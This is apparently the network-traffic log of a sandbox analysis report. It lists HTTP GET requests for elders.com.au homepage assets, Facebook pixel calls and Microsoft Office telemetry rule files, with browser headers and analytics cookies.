Source: global trafficHTTP traffic detected: GET /signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/facebook.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/xicon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/youtube.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/Instagram.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/logos/Red_logo.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/linkedin.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/facebook.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/youtube.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/Instagram.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /tr/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793807974&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/linkedin.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/social-share/xicon.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /bin/el/localised-news?branchId= HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
